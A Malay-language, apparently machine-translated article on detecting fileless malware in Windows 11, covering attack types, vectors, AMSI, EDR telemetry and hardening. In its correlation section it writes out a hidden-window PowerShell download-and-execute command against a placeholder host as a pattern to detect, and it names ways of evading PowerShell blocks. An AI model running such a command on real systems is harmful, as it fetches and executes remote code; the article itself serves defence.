Bagaimana untuk mengesan perisian hasad tanpa fail berbahaya dalam Windows 11

¿Bagaimana untuk mengesan perisian hasad tanpa fail berbahaya? Aktiviti serangan tanpa fail telah berkembang dengan ketara, dan memburukkan lagi keadaan, Windows 11 tidak kebalPendekatan ini memintas cakera dan bergantung pada memori dan alat sistem yang sah; itulah sebabnya program antivirus berasaskan tandatangan bergelut. Jika anda sedang mencari cara yang boleh dipercayai untuk mengesannya, jawapannya terletak pada penggabungan telemetri, analisis tingkah laku dan kawalan Windows.

Dalam ekosistem semasa, kempen yang menyalahgunakan PowerShell, WMI atau Mshta wujud bersama dengan teknik yang lebih canggih seperti suntikan memori, kegigihan "tanpa menyentuh" ​​cakera dan juga penyalahgunaan perisian tegarPerkara utama ialah memahami peta ancaman, fasa serangan dan isyarat yang mereka tinggalkan walaupun segala-galanya berlaku dalam RAM.

Apakah perisian hasad tanpa fail dan mengapa ia menjadi kebimbangan dalam Windows 11?

Apabila kita bercakap tentang ancaman "tanpa fail", kita merujuk kepada kod berniat jahat itu Anda tidak perlu mendepositkan boleh laku baharu dalam sistem fail untuk beroperasi. Ia biasanya disuntik ke dalam proses yang sedang berjalan dan dilaksanakan dalam RAM, bergantung pada penterjemah dan binari yang ditandatangani oleh Microsoft (cth., PowerShell, WMI, rundll32, mshtaIni mengurangkan jejak anda dan membolehkan anda memintas enjin yang hanya mencari fail yang mencurigakan.

Malah dokumen pejabat atau PDF yang mengeksploitasi kelemahan untuk melancarkan arahan dianggap sebagai sebahagian daripada fenomena itu, kerana mengaktifkan pelaksanaan dalam ingatan tanpa meninggalkan binari berguna untuk analisis. Penyalahgunaan makro dan DDE Di Office, kerana kod berjalan dalam proses yang sah seperti WinWord.

Penyerang menggabungkan kejuruteraan sosial (pancingan data, pautan spam) dengan perangkap teknikal: klik pengguna memulakan rantaian di mana skrip memuat turun dan melaksanakan muatan terakhir dalam ingatan, mengelak meninggalkan jejak pada cakera. Objektifnya terdiri daripada pencurian data kepada pelaksanaan perisian tebusan, kepada pergerakan sisi senyap.

Tipologi mengikut jejak dalam sistem: daripada 'tulen' kepada kacukan

Untuk mengelakkan konsep yang mengelirukan, adalah berguna untuk memisahkan ancaman mengikut tahap interaksinya dengan sistem fail. Pengkategorian ini menjelaskan apa yang berterusan, di mana kod itu hidup, dan apakah tanda yang ditinggalkannya?.

Jenis I: tiada aktiviti fail

Perisian hasad tanpa fail sepenuhnya tidak menulis apa-apa pada cakera. Contoh klasik ialah mengeksploitasi a kelemahan rangkaian (seperti vektor EternalBlue pada masa itu) untuk melaksanakan pintu belakang yang berada dalam memori kernel (kes seperti DoublePulsar). Di sini, segala-galanya berlaku dalam RAM dan tiada artifak dalam sistem fail.

Pilihan lain ialah mencemarkan perisian tegar komponen: BIOS/UEFI, penyesuai rangkaian, peranti USB (teknik jenis BadUSB) atau bahkan subsistem CPU. Mereka berterusan melalui permulaan semula dan pemasangan semula, dengan kesukaran tambahan itu Beberapa produk memeriksa perisian tegarIni adalah serangan yang kompleks, kurang kerap, tetapi berbahaya kerana diam-diam dan ketahanannya.

Jenis II: Aktiviti pengarkiban tidak langsung

Di sini, perisian hasad tidak "meninggalkan" boleh laku sendiri, tetapi menggunakan bekas terurus sistem yang pada asasnya disimpan sebagai fail. Contohnya, pintu belakang yang menanam Perintah PowerShell dalam repositori WMI dan cetuskan pelaksanaannya dengan penapis acara. Ia adalah mungkin untuk memasangnya dari baris arahan tanpa menjatuhkan binari, tetapi repositori WMI berada pada cakera sebagai pangkalan data yang sah, menjadikannya sukar untuk dibersihkan tanpa menjejaskan sistem.

Dari sudut pandangan praktikal, mereka dianggap tanpa fail, kerana bekas itu (WMI, Registry, dll.) Ia bukan boleh laku yang boleh dikesan klasik Dan pembersihannya tidak remeh. Hasilnya: kegigihan senyap dengan sedikit kesan "tradisional".

Jenis III: Memerlukan fail untuk berfungsi

Beberapa kes mengekalkan a kegigihan 'tanpa fail' Pada tahap logik, mereka memerlukan pencetus berasaskan fail. Contoh biasa ialah Kovter: ia mendaftarkan kata kerja shell untuk sambungan rawak; apabila fail dengan sambungan itu dibuka, skrip kecil menggunakan mshta.exe dilancarkan, yang membina semula rentetan berniat jahat daripada Pejabat Pendaftaran.

Caranya ialah fail "umpan" dengan sambungan rawak ini tidak mengandungi muatan yang boleh dianalisis, dan sebahagian besar kod berada dalam Rekod (bekas lain). Itulah sebabnya ia dikategorikan sebagai impak tanpa fail, walaupun secara tegasnya ia bergantung pada satu atau lebih artifak cakera sebagai pencetus.

Vektor dan 'perumah' jangkitan: tempat ia masuk dan tempat ia bersembunyi

Untuk meningkatkan pengesanan, adalah penting untuk memetakan titik kemasukan dan hos jangkitan. Perspektif ini membantu mereka bentuk kawalan khusus Utamakan telemetri yang sesuai.

Eksploitasi

• berasaskan fail (Jenis III): Dokumen, boleh laku, fail Flash/Java warisan atau fail LNK boleh mengeksploitasi penyemak imbas atau enjin yang memprosesnya untuk memuatkan kod shell ke dalam memori. Vektor pertama ialah fail, tetapi muatan bergerak ke RAM.
• berasaskan rangkaian (Jenis I): Pakej yang mengeksploitasi kelemahan (cth., dalam SMB) mencapai pelaksanaan dalam tanah pengguna atau kernel. WannaCry mempopularkan pendekatan ini. Beban memori langsung tanpa fail baharu.

Perkakasan

• Peranti (Jenis I): Perisian cakera atau kad rangkaian boleh diubah dan kod diperkenalkan. Sukar untuk diperiksa dan berterusan di luar OS.
• CPU dan subsistem pengurusan (Jenis I): Teknologi seperti ME/AMT Intel telah menunjukkan laluan ke Rangkaian dan pelaksanaan di luar OSIa menyerang pada tahap yang sangat rendah, dengan potensi senyap yang tinggi.
• USB (Jenis I): BadUSB membolehkan anda memprogram semula pemacu USB untuk menyamar sebagai papan kekunci atau NIC dan melancarkan arahan atau mengubah hala trafik.
• BIOS/UEFI (Jenis I): pengaturcaraan semula perisian tegar berniat jahat (kes seperti Mebromi) yang dijalankan sebelum Windows but.
• Pengawas (Jenis I): Melaksanakan hypervisor mini di bawah OS untuk menyembunyikan kehadirannya. Jarang, tetapi sudah diperhatikan dalam bentuk rootkit hypervisor.

Pelaksanaan dan suntikan

• berasaskan fail (Jenis III): EXE/DLL/LNK atau tugas berjadual yang melancarkan suntikan ke dalam proses yang sah.
• Makro (Jenis III): VBA dalam Office boleh menyahkod dan melaksanakan muatan, termasuk perisian tebusan penuh, dengan persetujuan pengguna melalui penipuan.
• Skrip (Jenis II): PowerShell, VBScript atau JScript daripada fail, baris arahan, perkhidmatan, Pendaftaran atau WMIPenyerang boleh menaip skrip dalam sesi jauh tanpa menyentuh cakera.
• Rekod but (MBR/Boot) (Jenis II): Keluarga seperti Petya menimpa sektor but untuk mengawal semasa permulaan. Ia berada di luar sistem fail, tetapi boleh diakses oleh OS dan penyelesaian moden yang boleh memulihkannya.

Cara serangan tanpa fail beroperasi: fasa dan isyarat

Walaupun mereka tidak meninggalkan fail boleh laku, kempen mengikut logik berperingkat. Memahami mereka membolehkan pemantauan. peristiwa dan hubungan antara proses yang meninggalkan kesan.

• Akses awalSerangan pancingan data menggunakan pautan atau lampiran, tapak web yang terjejas atau bukti kelayakan yang dicuri. Banyak rantaian bermula dengan dokumen Office yang mencetuskan arahan PowerShell.
• Kegigihan: pintu belakang melalui WMI (penapis dan langganan), Kunci pelaksanaan pendaftaran atau tugas berjadual yang melancarkan semula skrip tanpa fail hasad baharu.
• ExfiltrationSetelah maklumat dikumpul, ia dihantar keluar dari rangkaian menggunakan proses yang dipercayai (pelayar, PowerShell, bitsadmin) untuk mencampurkan trafik.

Corak ini amat berbahaya kerana penunjuk serangan Mereka bersembunyi dalam kenormalan: argumen baris perintah, rantaian proses, sambungan keluar anomali atau akses kepada API suntikan.

Teknik biasa: dari ingatan kepada rakaman

Pelakon bergantung pada pelbagai kaedah yang mengoptimumkan senyap. Adalah berguna untuk mengetahui yang paling biasa untuk mengaktifkan pengesanan yang berkesan.

• Bermastautin dalam ingatan: Memuatkan muatan ke dalam ruang proses yang dipercayai yang menunggu pengaktifan. rootkit dan cangkuk Dalam kernel, mereka meningkatkan tahap penyembunyian.
• Kegigihan dalam PendaftaranSimpan gumpalan yang disulitkan dalam kekunci dan hidratkannya semula daripada pelancar yang sah (mshta, rundll32, wscript). Pemasang sementara boleh merosakkan sendiri untuk meminimumkan jejaknya.
• Pancingan data kelayakanMenggunakan nama pengguna dan kata laluan yang dicuri, penyerang melaksanakan cengkerang dan tumbuhan jauh akses senyap dalam Pendaftaran atau WMI.
• Perisian Ransomware 'Tanpa Fail'Penyulitan dan komunikasi C2 diatur daripada RAM, mengurangkan peluang untuk pengesanan sehingga kerosakan dapat dilihat.
• Kit pengendalian: rantaian automatik yang mengesan kelemahan dan menggunakan muatan memori sahaja selepas pengguna mengklik.
• Dokumen dengan kod: makro dan mekanisme seperti DDE yang mencetuskan arahan tanpa menyimpan boleh laku ke cakera.

Kajian industri telah pun menunjukkan kemuncak yang ketara: dalam satu tempoh 2018, a peningkatan lebih 90% dalam serangan berasaskan skrip dan rangkaian PowerShell, tanda bahawa vektor lebih disukai kerana keberkesanannya.

Cabaran untuk syarikat dan pembekal: mengapa menyekat tidak mencukupi

Ia akan menggoda untuk melumpuhkan PowerShell atau mengharamkan makro selama-lamanya, tetapi Anda akan mematahkan operasiPowerShell ialah tonggak pentadbiran moden dan Pejabat adalah penting dalam perniagaan; menyekat secara membuta tuli selalunya tidak dapat dilaksanakan.

Tambahan pula, terdapat cara untuk memintas kawalan asas: menjalankan PowerShell melalui DLL dan rundll32, skrip pembungkusan ke dalam EXE, Bawa salinan PowerShell anda sendiri atau bahkan menyembunyikan skrip dalam imej dan mengekstraknya ke dalam ingatan. Oleh itu, pembelaan tidak boleh hanya berdasarkan menafikan kewujudan alat.

Satu lagi kesilapan biasa ialah menyerahkan keseluruhan keputusan kepada awan: jika ejen perlu menunggu respons daripada pelayan, Anda kehilangan pencegahan masa nyataData telemetri boleh dimuat naik untuk memperkayakan maklumat, tetapi Mitigasi mesti berlaku pada titik akhir.

Bagaimana untuk mengesan perisian hasad tanpa fail dalam Windows 11: telemetri dan tingkah laku

Strategi menang ialah memantau proses dan ingatanBukan fail. Tingkah laku berniat jahat adalah lebih stabil daripada bentuk fail, menjadikannya sesuai untuk enjin pencegahan.

• AMSI (Antara Muka Imbasan Antimalware)Ia memintas skrip PowerShell, VBScript atau JScript walaupun apabila ia dibina secara dinamik dalam ingatan. Cemerlang untuk menangkap rentetan yang dikelirukan sebelum pelaksanaan.
• Pemantauan proses: mula/selesai, PID, ibu bapa dan kanak-kanak, laluan, baris arahan dan cincang, serta pokok pelaksanaan untuk memahami cerita penuh.
• Analisis ingatan: pengesanan suntikan, beban reflektif atau PE tanpa menyentuh cakera, dan semakan kawasan boleh laku yang luar biasa.
• Perlindungan sektor permulaan: kawalan dan pemulihan MBR/EFI sekiranya berlaku gangguan.

Dalam ekosistem Microsoft, Defender for Endpoint menggabungkan AMSI, pemantauan tingkah lakuPengimbasan memori dan pembelajaran mesin berasaskan awan digunakan untuk menskalakan pengesanan terhadap varian baharu atau yang dikelirukan. Vendor lain menggunakan pendekatan serupa dengan enjin pemastautin kernel.

Contoh korelasi realistik: daripada dokumen ke PowerShell

Bayangkan rantaian di mana Outlook memuat turun lampiran, Word membuka dokumen, kandungan aktif didayakan dan PowerShell dilancarkan dengan parameter yang mencurigakan. Telemetri yang betul akan menunjukkan baris arahan (cth., ExecutionPolicy Bypass, tetingkap tersembunyi), menyambung ke domain yang tidak dipercayai dan mencipta proses anak yang memasang sendiri dalam AppData.

Seorang ejen dengan konteks tempatan mampu berhenti dan terbalik aktiviti berniat jahat tanpa campur tangan manual, selain memberitahu SIEM atau melalui e-mel/SMS. Sesetengah produk menambah lapisan atribusi punca (model jenis StoryLine), yang tidak menunjukkan proses yang boleh dilihat (Outlook/Word), tetapi kepada benang berniat jahat penuh dan asalnya untuk membersihkan sistem secara menyeluruh.

Corak arahan biasa yang perlu diperhatikan mungkin kelihatan seperti ini: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');Logik bukanlah rentetan yang tepat, tetapi set isyarat: pintasan dasar, tetingkap tersembunyi, muat turun jelas, dan pelaksanaan dalam memori.

AMSI, saluran paip dan peranan setiap pelakon: dari titik akhir ke SOC

Di luar penangkapan skrip, seni bina yang mantap mengatur langkah yang memudahkan penyiasatan dan tindak balas. Lebih banyak bukti sebelum melaksanakan beban, lebih baik., lebih baik.

• pintasan skripAMSI menyampaikan kandungan (walaupun ia dijana dengan cepat) untuk analisis statik dan dinamik dalam saluran perisian hasad.
• Proses peristiwaPID, binari, cincangan, laluan dan data lain dikumpulkan. hujah-hujah, mewujudkan pokok proses yang membawa kepada beban akhir.
• Pengesanan dan pelaporanPengesanan dipaparkan pada konsol produk dan dimajukan ke platform rangkaian (NDR) untuk visualisasi kempen.
• Jaminan penggunaWalaupun skrip disuntik ke dalam ingatan, rangka kerja AMSI memintasnya dalam versi Windows yang serasi.
• Keupayaan pentadbir: konfigurasi dasar untuk membolehkan pemeriksaan skrip, penyekatan berasaskan tingkah laku dan membuat laporan daripada konsol.
• kerja SOC: pengekstrakan artifak (VM UUID, versi OS, jenis skrip, proses pemula dan induknya, cincangan dan baris arahan) untuk mencipta semula sejarah dan peraturan angkat masa depan.

Apabila platform membenarkan mengeksport penimbal ingatan Berkaitan dengan pelaksanaan, penyelidik boleh menjana pengesanan baharu dan memperkaya pertahanan terhadap varian serupa.

Langkah-langkah praktikal dalam Windows 11: pencegahan dan pemburuan

Selain mempunyai EDR dengan pemeriksaan memori dan AMSI, Windows 11 membolehkan anda menutup ruang serangan dan meningkatkan keterlihatan dengan kawalan asli.

• Pendaftaran dan sekatan dalam PowerShellMendayakan Pengelogan Blok Skrip dan Pengelogan Modul, menggunakan mod terhad jika boleh, dan mengawal penggunaan Pintasan/Tersembunyi.
• Peraturan Pengurangan Permukaan Serangan (ASR).: menyekat pelancaran skrip oleh proses Office dan penyalahgunaan WMI/PSExec apabila tidak diperlukan.
• Dasar makro pejabat: melumpuhkan secara lalai, tandatangan makro dalaman dan senarai amanah yang ketat; memantau aliran DDE warisan.
• Audit dan Pendaftaran WMI: memantau langganan acara dan kekunci pelaksanaan automatik (Run, RunOnce, Winlogon), serta penciptaan tugas dijadualkan.
• Perlindungan permulaan: mengaktifkan Secure Boot, menyemak integriti MBR/EFI dan mengesahkan bahawa tiada pengubahsuaian semasa permulaan.
• Menampal dan mengeras: menutup kelemahan yang boleh dieksploitasi dalam penyemak imbas, komponen Office dan perkhidmatan rangkaian.
• Kesedaran: melatih pengguna dan pasukan teknikal dalam pancingan data dan isyarat hukuman mati terselindung.

Untuk memburu, fokus pada pertanyaan tentang: mencipta proses oleh Office ke arah PowerShell/MSHTA, hujah dengan rentetan muat turun/muat turun failSkrip dengan kekeliruan yang jelas, suntikan reflektif dan rangkaian keluar kepada TLD yang mencurigakan. Rujuk silang isyarat ini dengan reputasi dan kekerapan untuk mengurangkan bunyi.

Apakah yang boleh dikesan oleh setiap enjin hari ini?

Penyelesaian perusahaan Microsoft menggabungkan AMSI, analisis tingkah laku, meneliti ingatan dan perlindungan sektor but, serta model ML berasaskan awan untuk skala terhadap ancaman yang muncul. Vendor lain melaksanakan pemantauan peringkat kernel untuk membezakan perisian hasad daripada perisian jinak dengan perubahan semula automatik.

Pendekatan berdasarkan cerita pelaksanaan Ia membolehkan anda mengenal pasti punca (contohnya, lampiran Outlook yang mencetuskan rantai) dan mengurangkan keseluruhan pepohon: skrip, kunci, tugas dan perduaan perantaraan, mengelakkan daripada tersekat pada gejala yang boleh dilihat.

Kesilapan biasa dan cara mengelakkannya

Menyekat PowerShell tanpa pelan pengurusan alternatif bukan sahaja tidak praktikal, tetapi ada juga cara untuk memanggilnya secara tidak langsungPerkara yang sama berlaku untuk makro: sama ada anda mengurusnya dengan dasar dan tandatangan, atau perniagaan akan terjejas. Adalah lebih baik untuk memberi tumpuan kepada telemetri dan peraturan tingkah laku.

Satu lagi kesilapan biasa ialah mempercayai bahawa aplikasi senarai putih menyelesaikan segala-galanya: teknologi tanpa fail bergantung tepat pada perkara ini. apl yang dipercayaiKawalan harus memerhatikan apa yang mereka lakukan dan bagaimana mereka berkaitan, bukan hanya sama ada mereka dibenarkan.

Dengan semua perkara di atas, perisian hasad tanpa fail tidak lagi menjadi "hantu" apabila anda memantau perkara yang benar-benar penting: tingkah laku, ingatan, dan asal usul daripada setiap pelaksanaan. Menggabungkan AMSI, telemetri proses yang kaya, kawalan Windows 11 asli dan lapisan EDR dengan analisis tingkah laku memberi anda kelebihan. Tambahkan pada persamaan dasar realistik untuk makro dan PowerShell, pengauditan WMI/Registry dan pemburuan yang mengutamakan baris arahan dan pokok proses, dan anda mempunyai pertahanan yang memotong rantai ini sebelum ia berbunyi.